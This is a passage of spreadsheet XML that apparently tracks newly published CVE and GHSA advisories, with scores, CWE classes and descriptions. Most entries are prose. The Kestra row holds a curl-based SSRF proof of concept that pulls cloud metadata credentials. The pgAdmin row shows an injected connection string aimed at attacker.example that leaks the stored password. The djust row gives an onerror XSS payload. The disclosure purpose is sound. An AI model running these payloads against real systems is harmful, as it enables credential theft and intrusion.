          <t>MythicalDash is a Pterodactyl client area. In 3.5.4-aurora and earlier, GET /api/stripe/process in backend/app/Api/System/Gateways/Stripe.php creates a pending row in mythicaldash_stripe_payments before Stripe checkout succeeds and embeds the payment code in the success redirect, while GET /api/stripe/processed accepts that code without constructing a Session, checking ownership, or retrieving the Stripe Checkout Session to require payment_status to be paid and amount_total to match the expected charge. An ordinary authenticated user can request an attacker-selected coins amount, abandon or fail payment, and submit the pending code directly to the unauthenticated processed endpoint. StripeDB::isPending() then permits User::addCreditsAtomic() to grant the unpaid amount and mark the row processed even though Stripe has not confirmed payment. This permits arbitrary free virtual-currency top-ups and direct financial loss through consumption of hosting resources. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54608</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66571</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Asset CleanUp: Page Speed Booster &lt;= 1.4.0.5 versions.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66571</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86049</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr">
        <is>
          <t>pip:jupyter_server</t>
        </is>
      </c>
      <c r="M231" s="5" t="inlineStr">
        <is>
          <t>2.21.0</t>
        </is>
      </c>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Jupyter Server is the backend for Jupyter web applications. Prior to version 2.21.0, the 5xx request logging path in jupyter_server/log.py copies the Referer header into a JSON header block without applying the token scrubbing used for the request URI. A request that returns HTTP 500 while the Referer contains a token-bearing URL can therefore write that token to server logs in plaintext. An attacker who can read those logs can recover the token and use the affected user's Jupyter Server permissions. This issue is fixed in version 2.21.0.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86049</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86862</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-522, CWE-88, CWE-918</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as 'host=attacker.example port=5432 dbname=x' therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user.
The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases, where the value was wrapped by a quoting helper that incidentally prevented expansion; it became affected when that wrapper was removed.
The fix supplies the target database in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. Where pg_restore requires a --dbname argument to be present, an empty value is passed, which contains no equals sign and is therefore not expanded, while the real name is taken from the environment.
This issue affects pgAdmin 4: from the introduction of the --dbname argument in the Restore and Maintenance tools before 9.18.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86862</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90887</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WP Inventory Manager &lt;= 2.5.4 versions.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90887</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90986</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Visitor Traffic Real Time Statistics Pro &lt;= 11.21 versions.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90986</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91014</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>The Realtyna Organic IDX plugin + WPL Real Estate WordPress plugin before 5.4.2 does not sanitise and escape some of its parameters before reflecting them back in the page, allowing unauthenticated attackers to run arbitrary web scripts in a visitor's browser if they can trick the visitor into following a crafted link (reflected XSS).</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91014</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92925</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Redis community. The cluster bus packet parser, responsible for handling PING, PONG, and MEET packets, fails to properly validate string-carrying extensions for null-termination. This oversight allows a remote attacker to craft a malicious packet, leading to an out-of-bounds read when the packet's payload is processed. Successful exploitation of this vulnerability could result in the disclosure of sensitive information or a remote denial of service (DoS).</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92925</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92959</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 does not fully enforce the allowAsync: false option in VM and NodeVM. While localPromise.prototype.then is replaced with a handler that throws 'Async not available', the sandbox's Promise static methods (Promise.resolve, Promise.all, Promise.race, Promise.any, and Promise.allSettled) still assimilate attacker-supplied thenables: native promise resolution performs PromiseResolveThenableJob and invokes the sandboxed code's then method in a microtask without passing through the patched then, so the async restriction is never applied. As a result, sandboxed script can schedule work that runs after VM.run() or NodeVM.run() has returned and outside the configured timeout, continuing to execute after the host believes execution is complete.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92959</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93014</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>RosarioSIS versions before 12.9 fail to validate the filename request parameter in Users and Students modules, allowing authenticated users to unlink allow-listed files via path traversal. Attackers can use parent-directory sequences to escape upload directories and delete CSS, XML, JSON resources and other users' documents throughout the installation.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93014</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45720</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-367</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.6.6 and from 1.7.0 until 1.7.3, SAML.getSession in internal/pkg/auth/interceptor/saml.go checks SAMLAssertion.Used and marks it used in separate state operations. Concurrent requests carrying the same captured saml-session token can each observe the assertion as unused and obtain authentication as the victim before either update is visible. The attacker can invoke SAML-protected gRPC endpoints, use ConfirmPublicKey to create multiple persistent credentials tied to the victim, and generate audit entries attributed to the victim, with the resulting access potentially affecting confidentiality, integrity, and availability according to the victim's privileges. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45720</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93015</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-787</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>BlueKitchen BTstack through 1.8.2 fails to validate the peer-reported endpoint count against table bounds in A2DP stream endpoint discovery. A bonded peer can send an AVDTP DISCOVER response with more endpoints than the fixed table holds, causing out-of-bounds writes that corrupt adjacent static objects and crash the process or sever event delivery.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93015</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73247</t>
        </is>
      </c>
      <c r="D241" s="5" t="inlineStr"/>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr">
        <is>
          <t>Maven:io.kestra:core, Maven:io.kestra:kestra-core</t>
        </is>
      </c>
      <c r="M241" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr"/>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>### Summary
The Pebble template engine's `http()` function in Kestra OSS accepts user-controlled URLs without any validation, allowing Server-Side Request Forgery (SSRF) attacks. An unauthenticated attacker can import a malicious Flow YAML and execute it to access internal services, cloud metadata endpoints (AWS 169.254.169.254), or localhost services. The vulnerability affects all Kestra OSS deployments with default configuration.
### Details
The root cause is in `core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java` (lines 77-106):
1. **No URL validation**: User input is passed directly to `URI.create()` with no checks for private IPs, internal hosts, or restricted schemes
2. **No IP filtering**: Missing checks for 10.0.0.0/8, 192.168.0.0/16, 169.254.169.254, 127.0.0.1
3. **No scheme restriction**: `file://`, `gopher://` schemes are not blocked
4. **No authentication required**: `TenantValidationFilter.java` only checks tenant == "main" — no authentication
5. **Unconditional registration**: `HttpFunction` is registered without any feature flags in `Extension.java:180`
### PoC
**Prerequisites:**
```bash
docker run -d --name kestra-ssrf -p 8080:8080 kestra/kestra:latest server local
sleep 30
```
**Step 1: Create malicious Flow YAML**
```yaml
cat &gt; /tmp/ssrf_poc.yaml &lt;&lt; 'YAML'
id: ssrf_metadata
namespace: company.team
tasks:
  - id: exfiltrate
    type: io.kestra.plugin.core.log.Log
    message: |
      {{ http(uri='http://169.254.169.254/latest/meta-data/', method='GET') }}
YAML
```
**Step 2: Import without authentication**
```bash
curl -X POST http://localhost:8080/api/v1/main/flows/import \
  -F "fileUpload=@/tmp/ssrf_poc.yaml"
```
**Step 3: Execute the flow**
```bash
curl -X POST http://localhost:8080/api/v1/main/executions/company.team/ssrf_metadata
```
**Step 4: Verify** — the flow execution output contains AWS EC2 metadata (ami-id, instance-type, IAM credentials if available)
### Impact
- **CVSS 3.1**: 8.6 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- **CWE**: CWE-918 (Server-Side Request Forgery)
- **Affected**: All Kestra OSS versions (default deployment)
- **Impact**: Attackers can access internal services, cloud metadata (AWS/GCP/Azure), localhost endpoints, and potentially escalate to cloud credential theft</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73247</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>GHSA-xjw9-38cr-6372</t>
        </is>
      </c>
      <c r="D242" s="5" t="inlineStr"/>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>PyPI:djust</t>
        </is>
      </c>
      <c r="M242" s="5" t="inlineStr">
        <is>
          <t>1.1.2</t>
        </is>
      </c>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr"/>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>A context safety grant was inherited by a template **binding** that never earned it, so rebinding a name the view had marked safe left the mark attached to the new, attacker-controlled value.
djust's context safety channel is keyed by **name**, not by value. Every bind copied the value and left the grant in place:
```
view marks   p = mark_safe('&lt;b&gt;trusted&lt;/b&gt;')
template     {% with p=user_input %}{{ p }}{% endwith %}
  djust   '&lt;img src=x onerror=alert(1)&gt;'          &lt;- executes
  django  '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```
## Affected binds
Eight distinct shapes were live. All are fixed in 1.1.2:
| shape | example |
|---|---|
| `{% with %}` rebinding a marked name | `{% with p=hostile %}{{ p }}{% endwith %}` |
| `{% with %}` **descendant** of a rebound name | `{% with p=hostile %}{{ p.a }}{% endwith %}` |
| `{% with %}` binding over a marked name | `{% with q=hostile %}{{ q }}{% endwith %}` |
| `{% for %}` loop variable | `{% for p in hostiles %}{{ p }}{% endfor %}` |
| `{% for %}` descendant | `{% for p in hostiles %}{{ p.a }}{% endfor %}` |
| `{% for %}` tuple unpacking | `{% for k, v in rows %}{{ v }}{% endfor %}` |
| `{% include … with %}` | `{% include "c.html" with q=hostile %}` |
| assign tags | `{% … as x %}` |
No filter chain and no `|safe` anywhere in the template is required. The precondition is that the application marked *some* value safe under a name that a template later rebinds — an ordinary pattern, since a view commonly marks trusted markup safe and templates commonly reuse short names such as `p`, `item` or `row`.
## Impact
Stored or reflected XSS in any djust application that combines `mark_safe` (or any framework path that grants a context key safety) with a template that rebinds that name. Exploitation requires no unusual template construct.
## Patches
Fixed in **1.1.2**, and in 1.2.0 (`main`).
The rule is that a bind **replaces** the grant rather than inheriting one. It is stated that way deliberately: the originally reported defects pointed the *opposite* direction — a grant being **lost** across some binds, causing over-escaping — and fixing only the reported direction would have left this leak in place. Both directions are the same rule.
**Not fixed in 1.1.2**, and tracked for 1.2.0: two over-escaping cases where a grant fails to travel with a value that legitimately carries one (`{% with body=post.text|linebreaks %}`, and `mark_safe` reaching a template through `dict.values` / `dict.items`). Both escape *more* than Django rather than less, so neither is a leak.
## Workarounds
Before upgrading, avoid reusing a context name for both `mark_safe`'d content and untrusted input, and avoid rebinding such a name in `{% with %}`, `{% for %}`, `{% include … with %}` or an assign tag.
## Credit
